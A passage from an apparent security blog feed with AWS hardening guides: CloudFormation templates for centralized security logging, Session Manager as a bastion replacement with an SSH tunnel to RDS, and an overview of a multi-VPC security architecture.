            Principal:
              Service: !Sub &quot;logs.${AWS::Region}.amazonaws.com&quot;
          - Action: sts:AssumeRole
            Effect: Allow
            Principal:
              Service: firehose.amazonaws.com
            Condition:
              StringEquals:
                sts:ExternalId: !Sub &quot;${AWS::AccountId}&quot;

  IngestionRolePolicy:
    Type: AWS::IAM::Policy
    Properties:
      PolicyName: security-log-writer-policy
      Roles:
        - !Ref IngestionRole
      PolicyDocument:
        Statement:
          - Sid: KinesisReadWrite
            Action:
              - kinesis:Describe*
              - kinesis:Get*
              - kinesis:List*
              - kinesis:Subscribe*
              - kinesis:PutRecord
            Effect: Allow
            Resource: !Sub &quot;arn:aws:kinesis:${AWS::Region}:${AWS::AccountId}:stream/secops-*&quot; # Namespacing this role for things named secops
          - Sid: S3ReadWrite
            Action:
              - s3:Get*
              - s3:Put*
              - s3:List*
            Effect: Allow
            Resource: # Namespace to assets starting with &quot;secops&quot;
              - &quot;arn:aws:s3:::secops-*&quot;
              - &quot;arn:aws:s3:::secops-*/*&quot;
          - Sid: Passrole
            Action:
              - iam:PassRole
            Effect: Allow
            Resource: !GetAtt IngestionRole.Arn
</code></pre>
<!--kg-card-end: markdown--><h3 id="kms-encryption-key">KMS Encryption Key</h3><p>We create a key that our role has complete access to. I also add the root user, and would recommend adding a security role for analysts in a real environment, or moving the logs into an analysis engine for consumption.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  KMSKey:
    Type: AWS::KMS::Key
    Properties:
      Description: Symmetric CMK
      KeyPolicy:
        Version: &apos;2012-10-17&apos;
        Id: key-default-1
        Statement:
        - Sid: KeyOwner
          Effect: Allow
          Principal:
            AWS: !Sub &quot;arn:aws:iam::${AWS::AccountId}:root&quot;
          Action: kms:*
          Resource: &apos;*&apos;
        - Sid: KeyUser
          Effect: Allow
          Principal:
            AWS: !GetAtt IngestionRole.Arn
          Action: kms:*
          Resource: &apos;*&apos;
</code></pre>
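<p>If you do add an analyst role, a decrypt-only statement appended to this key policy might look like the following sketch. Note that the <code>security-analyst</code> role name is a placeholder for illustration - the templates in this series do not create it.</p><pre><code class="language-yaml">        - Sid: AnalystDecryptOnly
          Effect: Allow
          Principal:
            AWS: !Sub &quot;arn:aws:iam::${AWS::AccountId}:role/security-analyst&quot;
          Action:
            - kms:Decrypt
            - kms:DescribeKey
          Resource: &apos;*&apos;
</code></pre>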
<!--kg-card-end: markdown--><h3 id="s3-bucket-policy">S3 bucket &amp; policy</h3><p>An encrypted, non-public bucket and a locked-down policy are all we need for this architecture. In a real environment, we would also want a data lifecycle policy to offload data to Glacier over time.</p><p>Here, I specify default AWS encryption, though a KMS key is preferred. Because logs are coming encrypted out of Kinesis already, they will actually land in the bucket encrypted with the KMS key anyway.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  LogBucket:
    Type: AWS::S3::Bucket
    Properties: 
      BucketName: !Ref LogBucketName
      # Prevent public access
      PublicAccessBlockConfiguration:
        BlockPublicPolicy: True
        BlockPublicAcls: True
        IgnorePublicAcls: True
        RestrictPublicBuckets: True
      # Encrypt the bucket - may also want to use KMS instead
      BucketEncryption:
        ServerSideEncryptionConfiguration:
          - ServerSideEncryptionByDefault:
              SSEAlgorithm: AES256

  LogBucketPolicy:
    Type: AWS::S3::BucketPolicy 
    DependsOn: LogBucket
    Properties:
      Bucket: !Ref LogBucket
      PolicyDocument:
        Version: 2012-10-17
        Statement:
          - Action:
            - S3:GetObject
            - S3:PutObject
            Effect: Allow
            Resource: !Sub &quot;arn:aws:s3:::${LogBucketName}/*&quot;
            Principal:
              AWS: !GetAtt IngestionRole.Arn
            Condition:
              Bool:
                aws:SecureTransport: True
</code></pre>
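<p>The lifecycle policy mentioned above can be added directly to the bucket definition. A sketch, where the 90-day Glacier transition and one-year expiration are placeholder values to tune for your retention and compliance needs:</p><pre><code class="language-yaml">  LogBucket:
    Type: AWS::S3::Bucket
    Properties:
      BucketName: !Ref LogBucketName
      # ... encryption and public access settings as above ...
      LifecycleConfiguration:
        Rules:
          - Id: archive-then-expire-logs
            Status: Enabled
            Transitions:
              - StorageClass: GLACIER
                TransitionInDays: 90
            ExpirationInDays: 365
</code></pre>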
<!--kg-card-end: markdown--><h3 id="kinesis-firehose">Kinesis &amp; Firehose</h3><p>Finally, we set up an encrypted Kinesis instance and Firehose. This is a minimal configuration of Kinesis, suitable for a smaller ingestion load. As the system scales up, this setup will require tweaking for higher availability and throughput.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  Stream:
    Type: AWS::Kinesis::Stream
    Properties: 
      Name: secops-SecurityLogStream
      ShardCount: 1
      StreamEncryption: 
        EncryptionType: KMS
        KeyId: !Ref KMSKey

  Firehose:
    Type: AWS::KinesisFirehose::DeliveryStream
    Properties: 
      DeliveryStreamName: secops-SecurityLogFirehose
      DeliveryStreamType: KinesisStreamAsSource
      KinesisStreamSourceConfiguration: 
        KinesisStreamARN: !GetAtt Stream.Arn
        RoleARN: !GetAtt IngestionRole.Arn
      S3DestinationConfiguration: 
        BucketARN: !GetAtt LogBucket.Arn
        BufferingHints: 
          IntervalInSeconds: 300
          SizeInMBs: 5
        CompressionFormat: GZIP
        EncryptionConfiguration: 
          KMSEncryptionConfig: 
            AWSKMSKeyARN: !GetAtt KMSKey.Arn
        RoleARN: !GetAtt IngestionRole.Arn
</code></pre>
<!--kg-card-end: markdown--><h3 id="aws-log-destination">AWS Log Destination</h3><p>Finally, we need to configure the destination that the application accounts will point at, and direct incoming logs to the stream. As of this writing, Destinations don&apos;t allow the normal policy attachment, making it difficult to include parameters and references.</p><p>The solution I use is to create the policy inline with Join functions, which will allow us to reference parameters. Because we are doing cross-account access, we have to specify which AWS accounts are allowed to write to our security account. Every time we add a new account, we will have to update this policy.</p><p>The format of the AppAccountIDs parameter is a comma-separated string of account IDs.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  LogDestination:
    Type: AWS::Logs::Destination
    DependsOn: Stream
    Properties: 
      DestinationName: SecurityLogDestination
      DestinationPolicy: 
        !Join
          - &apos;&apos;
          - - &apos;{&apos;
            - &apos;    &quot;Version&quot; : &quot;2012-10-17&quot;,&apos;
            - &apos;    &quot;Statement&quot; : [&apos;
            - &apos;      {&apos;
            - &apos;        &quot;Sid&quot; : &quot;&quot;,&apos;
            - &apos;        &quot;Effect&quot; : &quot;Allow&quot;,&apos;
            - &apos;        &quot;Principal&quot; : {&apos;
            - &apos;          &quot;AWS&quot; : [&apos;
            - !Ref AppAccountIDs
            - &apos;           ]&apos;
            - &apos;        },&apos;
            - &apos;        &quot;Action&quot; : &quot;logs:PutSubscriptionFilter&quot;,&apos;
            - !Sub &apos;        &quot;Resource&quot; : &quot;arn:aws:logs:${AWS::Region}:${AWS::AccountId}:destination:SecurityLogDestination&quot;&apos;
            - &apos;      }&apos;
            - &apos;    ]&apos;
            - &apos;  }&apos;
      RoleArn: !GetAtt IngestionRole.Arn
      TargetArn: !GetAtt Stream.Arn
</code></pre>
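<p>For reference, the application-account side that subscribes to this destination boils down to a log group and a subscription filter. A minimal sketch, assuming the security account ID arrives via a <code>SecurityAccountId</code> parameter (see the full templates in GitHub for the exact version used in this series):</p><pre><code class="language-yaml">  SecurityLogGroup:
    Type: AWS::Logs::LogGroup
    Properties:
      LogGroupName: logs-for-security-ingestion

  SecuritySubscription:
    Type: AWS::Logs::SubscriptionFilter
    Properties:
      LogGroupName: !Ref SecurityLogGroup
      FilterPattern: &quot;&quot; # an empty pattern forwards every event; tighten it to scope down ingestion
      DestinationArn: !Sub &quot;arn:aws:logs:${AWS::Region}:${SecurityAccountId}:destination:SecurityLogDestination&quot;
</code></pre>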
<!--kg-card-end: markdown--><h1 id="generating-test-logs">Generating Test Logs</h1><p>I didn&apos;t cover the creation of a log group or subscription above, but you can see the templates in <a href="https://github.com/Charlie-belmer/advanced_aws_security_infrastructure/tree/master/log_centralization?ref=nullsweep.com">GitHub</a> (they are pretty simple). To run a test, I want to configure CloudWatch on an EC2 instance to send the <code>/var/log/messages</code> logfile to the created group, then see if it makes its way to S3.</p><p>A good walkthrough of this setup process can be found on <a href="https://blogs.tensult.com/2018/04/13/sending-linux-logs-to-aws-cloudwatch/?ref=nullsweep.com">tensult&apos;s blog</a>. The key item is to ensure that the <code>awslogs</code> process settings file references the proper log group:</p><!--kg-card-begin: markdown--><pre><code class="language-bash">[/var/log/messages]
datetime_format = %b %d %H:%M:%S
file = /var/log/messages
buffer_duration = 5000
log_stream_name = {instance_id}
initial_position = start_of_file
log_group_name = logs-for-security-ingestion
</code></pre>
<!--kg-card-end: markdown--><p>You should immediately see logs flowing into CloudWatch, and within five or ten minutes, showing up in S3 as gzipped files.</p><h2 id="conclusions">Conclusions</h2><p>Centralizing logs across many application accounts is more confusing than it probably should be. Moving the logs from S3 into another system frequently requires additional infrastructure and configurations. However, the security benefits of this are numerous, and it&apos;s probably worth doing as you scale up a larger business on AWS.</p><p>Unfortunately, all this infrastructure doesn&apos;t come free. Each component carries a cost (though I have not found it to be notable compared to what is monitored, with tight filters to scope down total logs ingested), and operational overhead. </p><p>I have not covered it here, but additional monitoring may be required to ensure that the log flow through these components is uninterrupted, and source logs are not being missed through missing subscriptions or improper CloudWatch agent setups.</p>]]></content:encoded></item><item><title><![CDATA[A Better Way to SSH in AWS (With RDS tunneling and security automation)]]></title><description><![CDATA[Setup and use System and Session Manager to replace bastion hosts for SSH and RDS tunnels. 
Automate security tasks on servers with automation documents.]]></description><link>https://nullsweep.com/a-better-way-to-ssh-in-aws/</link><guid isPermaLink="false">5e4a7a8bab3deb04f38745b5</guid><category><![CDATA[AWS]]></category><category><![CDATA[DevSecOps]]></category><category><![CDATA[Technical Guides]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 25 Feb 2020 02:11:49 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/02/ssh_and_rds_tunnel-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/02/ssh_and_rds_tunnel-1.jpg" alt="A Better Way to SSH in AWS (With RDS tunneling and security automation)"><p>When I first started using AWS environments, the Bastion architecture was prevalent as the way to setup SSH connections. A dedicated &quot;bastion&quot; server is provisioned with SSH ports exposed to an internal network, or in some cases the internet, so that other servers do not have to expose their own SSH ports. Sometimes, the bastion host is used to tunnel to databases or other more sensitive ports as well, though I generally prefer to chain SSH -&gt; bastion -&gt; application server -&gt; DB/etc.</p><p>While this method is good because it reduces the attack surface area and gives a single point of control, it also increases overall cost of maintenance and results in a pretty risky server.</p><p>In 2019, AWS announced tunneling support for SSH and SCP with Systems Manager, meaning that Bastion hosts can be replaced for most use cases. 
We can also pick up a few extra security goodies when moving to Systems Manager:</p><ul><li>Automated server patching</li><li>Enforced security standards on OS-level hardening or agent installs</li><li>Full SSH session logging is simple to enable (I actually recommend disabling this unless you really need it, to avoid storing sensitive information in these logs)</li></ul><p>In this article, we&apos;ll be walking through an initial SSM setup, testing SSH to an EC2 instance along with a tunnel to RDS, and then configuring automated patching and security checks for that instance.</p><p>The templates shown in this article don&apos;t depend on other templates in my <a href="https://nullsweep.com/advanced-aws-security-architecture/">Advanced AWS security architecture</a> series, but you might be interested in reading the first article before taking on this one.</p><p>The full CloudFormation template for deploying a Systems Manager-enabled instance with a sample automation document can be found on my <a href="https://github.com/Charlie-belmer/advanced_aws_security_infrastructure?ref=nullsweep.com">GitHub</a>.</p><h2 id="initial-ssm-setup">Initial SSM setup</h2><p>In order to leverage SSM, we need a few things:</p><ul><li>An instance profile we can attach to EC2 instances</li><li>A role that can assume permissions for SSM tasks</li><li>An SSM agent installed and running on the EC2 instance.</li></ul><p>Here is a CloudFormation snippet to create an instance profile and a role that allows the EC2 instance to leverage SSM:</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  SSMProfile:
    DependsOn: SSMRole
    Type: AWS::IAM::InstanceProfile
    Properties: 
      InstanceProfileName: SSMInstanceProfile
      Roles: 
        - !Ref SSMRole

  SSMRole:
    Type: AWS::IAM::Role
    Properties: 
      AssumeRolePolicyDocument:
        Version: 2012-10-17
        Statement:
          - Effect: Allow
            Principal:
              Service:
                - ec2.amazonaws.com
            Action:
              - &apos;sts:AssumeRole&apos;
      Description: Basic SSM permissions for EC2
      ManagedPolicyArns: 
        - arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore 
      RoleName: SSMInstanceProfile
</code></pre>
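<p>As a sketch of what a scoped-down alternative to the managed policy might look like, the role could instead carry an inline policy granting only the channels the agent needs. The action list below mirrors the documented core SSM agent permissions, but verify it against your agent version and feature set before relying on it:</p><pre><code class="language-yaml">      Policies:
        - PolicyName: ssm-agent-minimal
          PolicyDocument:
            Version: 2012-10-17
            Statement:
              - Effect: Allow
                Action:
                  - ssm:UpdateInstanceInformation
                  - ssmmessages:CreateControlChannel
                  - ssmmessages:CreateDataChannel
                  - ssmmessages:OpenControlChannel
                  - ssmmessages:OpenDataChannel
                  - ec2messages:GetMessages
                  - ec2messages:AcknowledgeMessage
                  - ec2messages:SendReply
                Resource: &apos;*&apos;
</code></pre>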
<!--kg-card-end: markdown--><p>I am using a managed policy for simplicity, but I recommend creating your own policy with limited permissions instead, as most managed policies are too permissive.</p><h2 id="automating-security-tasks-with-ssm">Automating Security Tasks with SSM</h2><p>Now that we have SSM available for instances, let&apos;s create a sample script that we would like to run on a regular basis across all our EC2 instances. To keep the example simple, we will write an Echo automation, which accepts a parameter and echos it into a local text file on the server.</p><p>Since I am using a shell script in this example, you could modify this template to do anything on the server. In the past I have used this method to install or verify installation of security agents, setup logging, audit software, and more.</p><p>First we will create a Document, which defines a single parameter and our shell script (a couple of echo commands).</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  EchoDocument: 
    Type: &quot;AWS::SSM::Document&quot;
    Properties: 
      Name: &quot;SecurityEchoDocument&quot;
      DocumentType: Command
      Content: 
        schemaVersion: &quot;1.2&quot;
        description: &quot;Just echo&apos;s into a file - to show how SSM works. A real document might check security agents, setup logging, or hardening attributes.&quot;
        parameters: 
          valueToEcho: 
            type: &quot;String&quot;
            description: &quot;Just a sample parameter&quot;
            default: &quot;Hello world!&quot;
        runtimeConfig: 
          aws:runShellScript:
            properties:
              - runCommand:
                  - echo &quot;{{ valueToEcho }}&quot; &gt;&gt; ssm.txt
                  - echo &quot;Done with SSM run&quot; &gt;&gt; ssm.txt
</code></pre>
<!--kg-card-end: markdown--><p>Next we will create a maintenance window that defines how frequently and when this should be run. For testing purposes, I want this to be run every 5 minutes:</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  EchoWindow:
    Type: AWS::SSM::MaintenanceWindow
    Properties: 
      AllowUnassociatedTargets: true
      Cutoff: 1
      Description: Run Echo documents - our sample automation
      Duration: 4
      Name: PatchWindow
      Schedule: cron(*/5 * * * ? *) # Every 5 minutes for this test. Probably not what you would really want!
</code></pre>
<!--kg-card-end: markdown--><p>Then, I create a grouping to execute the script on target instances. Here, it is based on tags specifically created for this task. We don&apos;t have to use tags, but I find it a simple way to group servers into sets based on automation documents targeting their risk level, OS, or something else.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  EchoTargets:
    Type: AWS::SSM::MaintenanceWindowTarget
    Properties: 
      Description: Add our server into the maintenance window
      Name: EchoTargets
      ResourceType: INSTANCE
      Targets: 
      - Key: tag:ShouldEcho
        Values: 
        - True
      WindowId: !Ref EchoWindow
</code></pre>
<!--kg-card-end: markdown--><p>Finally, we will tie this all together with a task. The task will link the targets to a window, and execute the document within the window schedule.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml"> EchoTask:
  Type: AWS::SSM::MaintenanceWindowTask
  Properties: 
    Description: Echo data on the machine
    MaxConcurrency: 3
    MaxErrors: 1
    Name: EchoTask
    Priority: 5
    Targets: 
    - Key: WindowTargetIds
      Values: 
      - !Ref EchoTargets
    TaskArn: !Ref EchoDocument
    TaskType: RUN_COMMAND
    TaskInvocationParameters:
      MaintenanceWindowRunCommandParameters:
        Parameters:
          valueToEcho:
            - &quot;Hello World from the maintenance window!&quot;
    WindowId: !Ref EchoWindow
</code></pre>
<!--kg-card-end: markdown--><p>We&apos;re done with the SSM setup and automation creation now! Any servers tagged with ShouldEcho == True will now have our Echo script run on them every 5 minutes. But we haven&apos;t actually created that server yet, so let&apos;s do that next.</p><h2 id="create-an-ec2-server-with-ssm">Create an EC2 Server With SSM</h2><p>Let&apos;s build that EC2 instance and leverage SSM on it. You should also build a tightly scoped IAM role for this instance. In an enterprise environment, you may have broader groups and scopes that dictate access, so be cautious: it is somewhat easy to over-provision access with this method. </p><p>If you grant a role <code>ssm:StartSession</code> or <code>ssm:ResumeSession</code> on <code>resource:*</code>, then that role will be able to log in as root to all SSM-enabled servers! (This is a good time to note that when I am peer reviewing IAM templates, any usage of <code>resource:*</code> gets flagged for close scrutiny: it is rarely what you really want when paired with <code>Allow</code> directives.)</p><p>Instead, grant a role with a tightly scoped resource. I tend to use name-spacing, where assets are prefixed with an application ID and environment (Dev/Prod/etc), and then scope with <code>resource:&lt;arn-prefix&gt;-&lt;application-ID&gt;-&lt;environment&gt;-*</code>. However, in this example I don&apos;t create any such role and am using an admin user for simplicity.</p><p>In the examples, I am using Amazon Linux 2, which comes with an SSM agent installed by default. If you are using an AMI that does not include the agent, you will need to add a provisioning step to install it. More can be found in the <a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/setup-launch-managed-instance.html?ref=nullsweep.com">AWS documentation on SSM agents</a>.</p><p>I also include a security group that does not open port 22 for SSH access. 
Instead, the server only allows traffic in on port 443, for encrypted HTTP, and all outbound traffic.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  SimpleServer:
    Type: AWS::EC2::Instance
    DependsOn: SSMProfile
    Properties:
      InstanceType: t3.micro
      SecurityGroupIds:
      - Ref: WebSecurityGroup
      IamInstanceProfile: !Ref SSMProfile
      ImageId: !Ref AMIID
      Tags: 
        - Key: ShouldEcho
          Value: "True"
      SsmAssociations:
        - AssociationParameters: 
            - Key: valueToEcho
              Value: 
                - &quot;Hello World from CloudFormation initialization!&quot;
          DocumentName: !Ref EchoDocument

  WebSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupDescription: Enable encrypted HTTP traffic only (in/out)
      VpcId: !Ref VpcId
      SecurityGroupIngress:
      - IpProtocol: tcp
        FromPort: &apos;443&apos;
        ToPort: &apos;443&apos;
        CidrIp: 0.0.0.0/0
</code></pre>
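<p>The tightly scoped session grant described earlier can be sketched as an IAM policy statement. This is an illustrative sketch only, expressed as a Python dict: the account ID, region, and tag condition below are placeholders I chose for illustration, not values from the template.</p>

```python
# A sketch of a tightly scoped session policy, instead of the dangerous
# "Resource": "*". The account ID and region in the ARN are placeholders.
scoped_session_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["ssm:StartSession", "ssm:ResumeSession"],
            # Limit the grant to EC2 instances in one account/region...
            "Resource": "arn:aws:ec2:us-east-1:111122223333:instance/*",
            # ...and only those carrying the tag we target elsewhere.
            "Condition": {
                "StringEquals": {"ssm:resourceTag/ShouldEcho": "True"}
            },
        }
    ],
}
```

The same idea applies to the name-spaced ARN prefixes discussed above; the condition key is just another way to narrow the blast radius of a session grant.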
<!--kg-card-end: markdown--><h2 id="putting-it-all-together">Putting It All Together</h2><p>Our template is now complete. Not shown here, but present in GitHub, is an RDS instance as well. Run it in an AWS environment using the AWS CLI.</p><!--kg-card-begin: markdown--><pre><code class="language-bash">aws cloudformation create-stack --stack-name ssm --template-body file://ssm.yaml --capabilities CAPABILITY_NAMED_IAM
</code></pre>
<!--kg-card-end: markdown--><p>You can now use the console to get a few more pieces of information about what was provisioned:</p><ul><li>The instance name, AZ, and other details from the EC2 panel</li><li>The DB master password from the Secrets Manager panel</li><li>The RDS Postgres instance URL from the RDS panel.</li><li>Session Manager to view automation documents and start an SSH session from your browser.</li></ul><p>Finally, we can use the console to add the group to Patch Manager. Now, every time the window comes up, AWS will also try to patch the instances with the latest security patches.</p><h2 id="a-better-way-to-ssh-on-aws-and-tunnel-to-rds-">A Better Way to SSH on AWS (and Tunnel to RDS)</h2><p>Now that everything is provisioned and you have gathered your information, let&apos;s SSH into our simple server, even though we didn&apos;t open port 22. In the console, navigate to Systems Manager, then Session Manager, select the instance, and click Start Session. You&apos;ll get a console window with root access!</p><p>Alternatively, and my preference, you can use the command line by installing a plugin to the AWS CLI and following the <a href="https://globaldatanet.com/blog/ssh-and-scp-with-aws-ssm/?ref=nullsweep.com">AWS guide on SSH</a>. Here, I SSH into the instance and verify that the automation Echo document we created is being executed and passed the parameters we defined.</p><!--kg-card-begin: markdown--><pre><code class="language-bash">aws ssm start-session --target i-01cbc9a20ce113029 --document-name AWS-StartSSHSession
...
sh-4.2$ ls -al ssm.txt
-rw-r--r-- 1 root root 132 Feb 19 17:16 ssm.txt
sh-4.2$ id
uid=1001(ssm-user) gid=1001(ssm-user) groups=1001(ssm-user)
sh-4.2$ cat ssm.txt
Hello World from CloudFormation initialization!
Done with SSM run
Hello World from CloudFormation initialization!
Done with SSM run
.... wait ~5 minutes...
sh-4.2$ cat ssm.txt
Hello World from CloudFormation initialization!
Done with SSM run
Hello World from CloudFormation initialization!
Done with SSM run
Hello World from the maintenance window!
Done with SSM run
</code></pre>
<!--kg-card-end: markdown--><p>We can also leverage SSM to port forward from our local machine to an RDS instance that is only accessible to the EC2 instance. Unfortunately, SSM does require a bit of extra work to get the tunnel working. </p><p>To complete this example, you will need the AWS CLI and SSM plugin, a local Postgres client (psql), and an SSH client. You can get the DB password by logging into the AWS console and retrieving the secret from the Secrets Manager service.</p><p>Below is a script that does a few things to set up our tunnel to the RDS instance:</p><ol><li>Temporarily (for 60 seconds) puts a public key on the EC2 instance (it creates a temporary keypair in the current directory)</li><li>Connects to the instance using the private key, and puts the tunnel control in a socket file (temp-ssh.sock)</li><li>Waits for the user to press a key, then closes the connection.</li></ol><!--kg-card-begin: markdown--><pre><code class="language-bash">ssh-keygen -t rsa -f temp -N &apos;&apos;
aws ec2-instance-connect send-ssh-public-key --instance-id i-07cec3c515bcb2e61 --availability-zone us-east-1b --instance-os-user ssm-user --ssh-public-key file://temp.pub
ssh -i temp -N -f -M -S temp-ssh.sock -L 3306:echodb-dev.cju92986bx4i.us-east-1.rds.amazonaws.com:5432 ssm-user@i-07cec3c515bcb2e61 -o &quot;UserKnownHostsFile=/dev/null&quot; -o &quot;StrictHostKeyChecking=no&quot; -o ProxyCommand=&quot;aws ssm start-session --target %h --document-name AWS-StartSSHSession --parameters portNumber=%p&quot;
read -rsn1 -p &quot;Press any key to close session.&quot;; echo
ssh -O exit -S temp-ssh.sock *
rm temp*
</code></pre>
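<p>The two key commands in the script above can also be assembled programmatically. Below is a minimal Python sketch of my own (not part of the original script; the instance ID, AZ, and DB host are parameters you supply) that builds the key-push and tunnel command strings from arguments instead of hard-coded values:</p>

```python
import shlex

def build_tunnel_commands(instance_id, az, db_host, local_port=3306,
                          db_port=5432, os_user="ssm-user", key_file="temp"):
    """Assemble the send-ssh-public-key and SSM tunnel commands.

    Nothing is executed here; the function only returns the two
    command strings so they can be reviewed or run elsewhere.
    """
    send_key = (
        f"aws ec2-instance-connect send-ssh-public-key "
        f"--instance-id {instance_id} --availability-zone {az} "
        f"--instance-os-user {os_user} --ssh-public-key file://{key_file}.pub"
    )
    # ProxyCommand tunnels the SSH session itself through SSM.
    proxy = (
        "aws ssm start-session --target %h "
        "--document-name AWS-StartSSHSession --parameters portNumber=%p"
    )
    tunnel = (
        f"ssh -i {key_file} -N -f -M -S temp-ssh.sock "
        f"-L {local_port}:{db_host}:{db_port} {os_user}@{instance_id} "
        f"-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "
        f"-o ProxyCommand={shlex.quote(proxy)}"
    )
    return send_key, tunnel
```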
<!--kg-card-end: markdown--><p>Of course, this shell script leaves a lot to be desired - it hard-codes the instance name, keyfile, AZ, etc. It should be used as a starting point for a more robust script. Once the &quot;Press any key&quot; message appears, we can connect to our instance with psql in a separate window:</p><!--kg-card-begin: markdown--><pre><code class="language-bash">$ psql -h localhost -p 3306 -U master postgres
Password for user master: 
psql (12.2 (Ubuntu 12.2-1.pgdg19.10+1), server 10.6)
SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)
Type &quot;help&quot; for help.

postgres=&gt; \q
</code></pre>
<!--kg-card-end: markdown--><p>Hitting any key on the original window will close the session and remove the socket file.</p><h2 id="conclusions">Conclusions</h2><p>We have built a complete management solution for a typical EC2/RDS architecture without exposing any SSH ports. We restricted the database to only allow connections from servers that will interact with it (no bastion!). We also set up an automation document that can be expanded upon to complete all sorts of automated security tasks on our server fleet.</p><p>This gives us improved SSH security at a lower cost and an overall simpler architecture and security group layout.</p><p>I&apos;d love to hear from the community on what great automation you have done with SSM!</p>]]></content:encoded></item><item><title><![CDATA[Advanced AWS Security Architecture]]></title><description><![CDATA[A series of articles implementing advanced security controls on AWS, leveraging built-in AWS security tooling and security best practices.]]></description><link>https://nullsweep.com/advanced-aws-security-architecture/</link><guid isPermaLink="false">5dde6290ab3deb04f38743ff</guid><category><![CDATA[Technical Guides]]></category><category><![CDATA[AWS]]></category><category><![CDATA[DevSecOps]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Sat, 11 Jan 2020 12:40:20 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1503387837-b154d5074bd2?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1503387837-b154d5074bd2?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="Advanced AWS Security Architecture"><p>Most articles on AWS security rightfully spend a lot of time talking about the basics, such as setting up minimized IAM roles, encrypting data, and basic 
monitoring. It is more difficult to find guidance and specific implementation recommendations on advanced, automated security configurations.</p><p>In this series of articles, I will be outlining advanced security architecture for large AWS deployments. This is the kind of material I wish had been laid out for me when I started securing our cloud environments and had to learn on my own.</p><p>It&apos;s also not enough to just show you the architectural layouts I recommend - I&apos;ll be diving deep to make sure the concepts, trade-offs, and implementation details are clear.</p><p>To that end, for each component, I will look at the security goals, the architecture and concepts, and finally a specific implementation example with CloudFormation templates, where I will call out what should change for actual implementations (everything here is designed for testing on a free personal account).</p><p>By the end of the series, you will have an application VPC to host business applications in, and a logically separate security VPC to aggregate data of interest such as logs, incident information, configurations, and an automated framework to analyze and respond to these items.</p><p>Since this is a large and complicated topic, I have broken it out into the following planned series of articles, building up the infrastructure and explaining it piece by piece.</p><ol><li>A Multi-VPC security strategy (this article)</li><li><a href="https://nullsweep.com/a-better-way-to-ssh-in-aws/">Using Session Manager to automate patching, secure SSH, and automated security agent installs.</a></li><li>Leveraging and centralizing AWS security tools with SecurityHub.</li><li><a href="https://nullsweep.com/centralized-security-logging-in-aws/">Aggregating and analyzing logs for security.</a></li><li>Building centralized compliance and security monitoring of infrastructure with Config, the Compliance Engine, and Rule Development Kit.</li></ol><h1 id="aws-security-basics">AWS Security 
Basics</h1><p>I won&apos;t go in depth here about setting up basic security, as this is a well-covered topic. If the team isn&apos;t solid on the basics, it would pay better dividends to develop practices and procedures to put them in place before moving on to building out the advanced security components.</p><p>Many cloud security incidents are the result of mis-configurations, where sensitive data is inadvertently exposed to the internet without controls. These controls are largely about preventing and detecting those possibilities.</p><p>In brief, be sure to have:</p><ul><li>IAM practices that ensure minimally scoped security groups, roles, and user groups, along with a change management process for modifying these items.</li><li>A solid patching strategy for any OSes, software, and platforms where Amazon doesn&apos;t take the lead.</li><li>A NACL / network firewall strategy and review process, along with a solid understanding of what might make a service open to the internet vs. internal users.</li><li>Similar to the above, a good understanding of bucket policies, and a review process to catch public buckets (We&apos;ll automate this later).</li><li>Solid secure development practices with a focus on cloud-native architectures.</li></ul><h2 id="multi-vpc-security-architecture">Multi-VPC Security Architecture</h2><p>Many teams start their cloud journey with a single VPC where all applications, logs, and data are stored. This is sub-optimal from a security perspective because if the VPC itself is compromised, so are many of the security controls we depend on as security professionals.</p><p>Therefore, I prefer to have a separate, dedicated VPC for security, which will constantly be monitoring the application VPC. 
As the business scales and adds additional VPC&apos;s, it is simple to roll out and centralize the same controls across all business environments, while keeping security analysts and data in a single place for all their work.</p><p>Eventually, we will have something like the below, with any number of application VPC&apos;s reporting back.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/01/aws_arch_diagram.png" class="kg-image" alt="Advanced AWS Security Architecture" loading="lazy"><figcaption>Advanced AWS security architecture</figcaption></figure><p>The key element of this architecture is that all relevant information for security monitoring and incident analysis is stored in the security VPC. We can drain any number of other logs (sysmon, syslog, Apache, etc.) via the CloudWatch drain shown.</p><p>Note that this is a high-level diagram, and does not show every service that will need to be leveraged to complete this setup - only the critical components to illustrate what we are trying to accomplish and the core AWS services we will be leveraging. When we implement each of these, I&apos;ll talk about each component in detail. The core services will be:</p><ul><li><strong>Security Hub</strong> to centralize and view mis-configurations and potential incidents that Amazon&apos;s internal tools have detected</li><li><strong>Config</strong> to track all infrastructure configuration changes, and validate them against policies, such as requiring S3 bucket encryption at rest.</li><li><strong>Session Manager</strong> to automate patching, configuration of common tooling, and SSH (instead of a bastion)</li><li><strong>CloudWatch</strong> to aggregate logs from many services and store them in our security VPC. 
